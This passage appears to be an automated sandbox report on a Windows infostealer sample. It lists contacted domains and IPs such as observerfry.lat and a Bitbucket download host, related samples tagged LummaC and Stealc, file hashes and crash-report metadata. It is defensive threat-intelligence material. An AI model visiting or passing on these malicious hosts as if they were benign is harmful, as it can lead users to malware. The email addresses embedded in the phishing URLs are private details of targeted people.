                                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                            high
                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://observerfry.lat/zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1393576879.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000037C000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorzLP3oiwG1g.exe, 00000000.00000003.1618402977.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893736231.0000000005929000.00000002.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.ecosia.org/newtab/zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brzLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://dz8aopenkvv6s.cloudfront.netzLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ac.ecosia.org/autocomplete?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.microzLP3oiwG1g.exe, 00000000.00000003.1543300122.0000000000356000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1446181758.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.0000000000353000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1467082412.0000000000342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgzLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.cookielaw.org/zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://bitbucket.org/DzLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://observerfry.lat/))zLP3oiwG1g.exe, 00000000.00000003.1470542881.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1419335143.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396948693.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396086235.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396513281.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1470979861.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445721130.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396336946.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://bbuseruploads.s3.amazonaws.com/zLP3oiwG1g.exefalse
                                                                                                                                                                  high
                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  172.67.199.72
                                                                                                                                                                  unknownUnited States
                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                  185.166.143.48
                                                                                                                                                                  bitbucket.orgGermany
                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                  52.217.67.100
                                                                                                                                                                  s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                  104.21.36.201
                                                                                                                                                                  observerfry.latUnited States
                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1579725
                                                                                                                                                                  Start date and time:2024-12-23 08:07:38 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 6m 3s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:zLP3oiwG1g.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:ad848f9eed40c0533c28f2c521395df8.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@2/5@4/4
                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                  • Number of non-executed functions: 12
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.109.210.53, 20.190.147.9
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target zLP3oiwG1g.exe, PID 7300 because there are no executed function
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  02:08:36API Interceptor24x Sleep call for process: zLP3oiwG1g.exe modified
                                                                                                                                                                  02:09:30API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  172.67.199.720HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                      U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                        185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                                                                                        104.21.36.201Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                            skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              observerfry.lat0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              s3-w.us-east-1.amazonaws.comYh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 3.5.16.86
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 16.182.37.145
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.216.41.233
                                                                                                                                                                              https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                              • 52.217.128.241
                                                                                                                                                                              https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                              • 52.216.142.68
                                                                                                                                                                              https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.231.135.57
                                                                                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 54.231.224.185
                                                                                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 52.217.32.148
                                                                                                                                                                              bitbucket.orgYh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.50
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.166.143.50
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              CLOUDFLARENETUS0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                              pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                              xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                              schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                              • 104.21.6.116
                                                                                                                                                                              AMAZON-02USYh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.203.164.5
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • 108.139.47.92
                                                                                                                                                                              https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 65.9.112.70
                                                                                                                                                                              https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 108.158.71.175
                                                                                                                                                                              CLOUDFLARENETUS0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                              pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                              xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                              schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                              • 104.21.6.116
                                                                                                                                                                              AMAZON-02USYh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.203.164.5
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • 108.139.47.92
                                                                                                                                                                              https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 65.9.112.70
                                                                                                                                                                              https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 108.158.71.175
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e10HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              spoolsv.COM.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):1.0425242073571763
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:vqFDfXM34nNZsnYhroI7JfpQXIDcQvc6QcEVcw3cE/heu+HbHg/8BRTf3Oy1oVa2:ilNZA0BU/wjudxQfzuiFnZ24IO8OM
                                                                                                                                                                              MD5:B93DA0D330BFBD76594171C10B4CB013
                                                                                                                                                                              SHA1:F240D6AFE5C004ED12A2C76010ECE667E4EDDC16
                                                                                                                                                                              SHA-256:B3B95EA5DE8FD84C0348E755909FD9F260A7705A1E2F713574FA62A0FEC32907
                                                                                                                                                                              SHA-512:0F9CF42A2431E5683BE6FDAC87552C8EEBFB1A1317F8A8EECC10ED26A16E2FB17131B48D97ED9F3C8DF5C1BD51E21B44473ACA0CAE06BB9444481EB32F41730F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.1.3.4.4.7.0.8.5.4.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.1.3.4.5.4.5.8.5.4.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.c.0.f.c.9.d.-.f.e.c.3.-.4.a.4.7.-.a.5.f.3.-.2.9.0.d.7.8.e.8.5.0.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.d.f.9.8.c.f.-.d.4.a.7.-.4.9.f.0.-.8.f.2.4.-.7.0.9.a.6.b.b.a.a.4.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.L.P.3.o.i.w.G.1.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.8.4.-.0.0.0.1.-.0.0.1.3.-.a.5.2.0.-.8.d.7.9.0.9.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.b.7.0.5.0.6.f.c.8.c.d.4.f.b.c.f.6.d.b.f.3.0.3.d.d.9.d.8.9.e.f.0.0.0.0.f.f.f.f.!.0.0.0.0.4.0.3.3.e.d.1.d.e.b.6.3.9.2.2.a.6.f.7.3.a.3.5.2.0.4.d.b.4.2.5.f.e.0.d.3.b.5.5.9.!.z.L.P.3.o.i.w.G.1.g...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
